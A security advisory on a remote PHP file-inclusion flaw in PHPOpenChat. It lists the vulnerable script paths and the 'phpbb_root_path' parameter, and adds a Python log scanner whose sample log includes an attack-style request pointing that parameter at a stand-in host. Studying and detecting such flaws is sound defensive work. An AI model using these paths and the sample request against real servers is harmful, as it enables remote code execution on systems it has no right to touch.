


Category:   Application (Instant Messaging/IRC/Chat)  >   PHPOpenChat
Vendors:
PHPOpenChat Include File Flaw Lets Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1013434
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Mar 16 2005
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 3.0.1 and prior versions
Description:   Mafia_Boy from Albania Security Clan reported an include file vulnerability in PHPOpenChat. A remote user can execute arbitrary commands on the target system.

A flaw resides in '/phpopenchat/contrib/phpbb/alternative2/phpBB2_root/poc_loginform.php', where the '' file is included relative to the 'phpbb_root_path' parameter value. A remote user can supply a specially crafted URL to cause the target server to include and execute arbitrary PHP code from a remote system. The PHP code, including operating system commands, will execute with the privileges of the target web service.

A demonstration exploit URL is provided:


Similar flaws exist in '/phpopenchat/contrib/phpbb/poc.php', '/phpopenchat/contrib/phpnuke/ENGLISH_poc.php', '/phpopenchat/contrib/phpnuke/poc.php', and '/phpopenchat/contrib/yabbse/poc.php'.

Some demonstration exploit URLs are provided:


If the 'register_globals' and 'allow_url_fopen' options are set to 'on' in the 'php.ini' configuration file, then a remote user can exploit these vulnerabilities.
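
As an added example (not part of the original advisory or of PHPOpenChat), the following Python code flags access-log requests to the script paths listed above that carry a remote URL in any query parameter, which is the request pattern this advisory describes. The log lines are constructed, and `host.invalid`, `suspicious_params` and `scan` are names assumed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Script paths listed in the advisory.
AFFECTED_SCRIPTS = (
    "/phpopenchat/contrib/phpbb/alternative2/phpBB2_root/poc_loginform.php",
    "/phpopenchat/contrib/phpbb/poc.php",
    "/phpopenchat/contrib/phpnuke/ENGLISH_poc.php",
    "/phpopenchat/contrib/phpnuke/poc.php",
    "/phpopenchat/contrib/yabbse/poc.php",
)
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
REMOTE_URL_RE = re.compile(r"^\s*(?:https?|ftps?)://", re.IGNORECASE)


def suspicious_params(log_line):
    """Return [(param, value)] for remote-URL parameters sent to an affected script."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    target = urlsplit(match.group(1))
    path = unquote(target.path)
    if not any(path.endswith(script) for script in AFFECTED_SCRIPTS):
        return []
    # With register_globals on, any request parameter can become a global,
    # so every parameter is checked, not only phpbb_root_path.
    return [(key, value) for key, value in parse_qsl(target.query, keep_blank_values=True)
            if REMOTE_URL_RE.match(value)]


def scan(lines):
    """Return [(line_number, hits)] for every log line with at least one hit."""
    return [(n, hits) for n, line in enumerate(lines, 1) if (hits := suspicious_params(line))]


# Constructed access-log lines (combined log format), for illustration only.
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Mar/2005:10:00:00 +0000] "GET /phpopenchat/contrib/phpbb/poc.php HTTP/1.1" 200 512',
    '192.0.2.44 - - [16/Mar/2005:10:00:05 +0000] "GET /phpopenchat/contrib/phpbb/alternative2/phpBB2_root/poc_loginform.php?phpbb_root_path=http%3A%2F%2Fhost.invalid%2F HTTP/1.1" 200 87',
    '192.0.2.10 - - [16/Mar/2005:10:00:09 +0000] "GET /index.php?next=http://host.invalid/ HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(f"line {number}: {hits}")
```

Access logs do not record POST bodies or cookies, which 'register_globals' also maps to global variables, so an empty result does not rule out attempts.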

The vendor has been notified.

The original advisory is available at:

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.

 Source Message Contents

Subject:  Multiples vulnerability in PHPOpenChat (File Inclusion Vulnerability) | -j #ASC
